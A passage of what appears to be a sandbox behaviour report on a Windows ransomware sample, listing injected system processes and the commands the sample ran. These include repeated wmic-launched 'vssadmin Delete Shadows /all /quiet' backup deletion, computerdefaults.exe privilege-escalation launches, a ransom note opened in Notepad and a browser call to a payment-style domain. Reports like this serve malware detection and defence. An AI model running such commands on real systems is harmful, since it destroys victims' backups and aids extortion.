PID 2720 wrote to memory of 832	2720	cmd.exe	104
PID 1796 wrote to memory of 1340	1796	cmd.exe	105
PID 1796 wrote to memory of 1340	1796	cmd.exe	105
PID 2880 wrote to memory of 2892	2880	TextInputHost.exe	120
PID 2880 wrote to memory of 2892	2880	TextInputHost.exe	120
PID 2880 wrote to memory of 2892	2880	TextInputHost.exe	120
PID 2880 wrote to memory of 696	2880	TextInputHost.exe	121
PID 2880 wrote to memory of 696	2880	TextInputHost.exe	121
PID 2880 wrote to memory of 696	2880	TextInputHost.exe	121
PID 2880 wrote to memory of 3928	2880	TextInputHost.exe	123
PID 2880 wrote to memory of 3928	2880	TextInputHost.exe	123
PID 2880 wrote to memory of 3928	2880	TextInputHost.exe	123
PID 2228 wrote to memory of 2980	2228	cmd.exe	126
PID 2228 wrote to memory of 2980	2228	cmd.exe	126
PID 2020 wrote to memory of 4400	2020	cmd.exe	127
PID 2020 wrote to memory of 4400	2020	cmd.exe	127
PID 1092 wrote to memory of 4252	1092	cmd.exe	128
PID 1092 wrote to memory of 4252	1092	cmd.exe	128
PID 4264 wrote to memory of 2764	4264	cmd.exe	131
PID 4264 wrote to memory of 2764	4264	cmd.exe	131
PID 4548 wrote to memory of 4980	4548	cmd.exe	132
PID 4548 wrote to memory of 4980	4548	cmd.exe	132
PID 4400 wrote to memory of 60	4400	msedge.exe	133
PID 4400 wrote to memory of 60	4400	msedge.exe	133
PID 4252 wrote to memory of 3788	4252	ComputerDefaults.exe	137
PID 4252 wrote to memory of 3788	4252	ComputerDefaults.exe	137
PID 4980 wrote to memory of 2400	4980	ComputerDefaults.exe	139
PID 4980 wrote to memory of 2400	4980	ComputerDefaults.exe	139
PID 2764 wrote to memory of 3508	2764	ComputerDefaults.exe	140
PID 2764 wrote to memory of 3508	2764	ComputerDefaults.exe	140
PID 2596 wrote to memory of 2824	2596	sihost.exe	143
PID 2596 wrote to memory of 2824	2596	sihost.exe	143
PID 2596 wrote to memory of 3420	2596	sihost.exe	144
PID 2596 wrote to memory of 3420	2596	sihost.exe	144
PID 2596 wrote to memory of 4772	2596	sihost.exe	145
PID 2596 wrote to memory of 4772	2596	sihost.exe	145
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149
PID 4400 wrote to memory of 1432	4400	msedge.exe	149

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2824
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3420
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5392
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4772
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2624
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5960
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5416
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4764
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1588

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3132
- C:\Windows\system32\cmd.exe
  cmd /c "start http://beac32f0063cfc3090illvahk.ourunit.xyz/illvahk^&2^&49296818^&72^&305^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://beac32f0063cfc3090illvahk.ourunit.xyz/illvahk&2&49296818&72&305&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ffe449546f8,0x7ffe44954708,0x7ffe44954718
      4⤵
      PID:60
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
      4⤵
      PID:1432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
      4⤵
      PID:4860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
      4⤵
      PID:4528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
      4⤵
      PID:3664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
      4⤵
      PID:5172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
      4⤵
      PID:5856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
      4⤵
      PID:5984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
      4⤵
      PID:5992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
      4⤵
      PID:4792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
      4⤵
      PID:5476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
      4⤵
      PID:4292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
      4⤵
      PID:1416
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:1
      4⤵
      PID:3428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,2095428258878719690,3472127643584502672,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2684 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4200
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:832
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3760

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3408
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3187619e1573920b7ef0cf1daecdabd4_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4124
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3360
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:3540
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4180
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:6000
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3708
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2508
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4764
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3572
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5772
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4036
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5440
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5512

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3764
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5236
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4760
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2948
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1864
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5452

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3852
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2432
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5632
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1864

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3916
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4912
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2004
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1340

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3796
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3524
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5408
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4964
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3716
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:6068

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:1924
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1544
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3460
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5488
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4996
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:304

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:696
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3928

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:3312

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Checks processor information in registry
- Modifies registry class
PID:3272

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4252
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3788

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3508

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3716

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4716

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2400

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2980
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5088

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3772

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5244

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5368

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5384

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5420

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5464

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5504

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5712
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5912
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6132

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5748
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5900
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6136

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2020

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4032

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6092

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5512
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3672
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6032

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
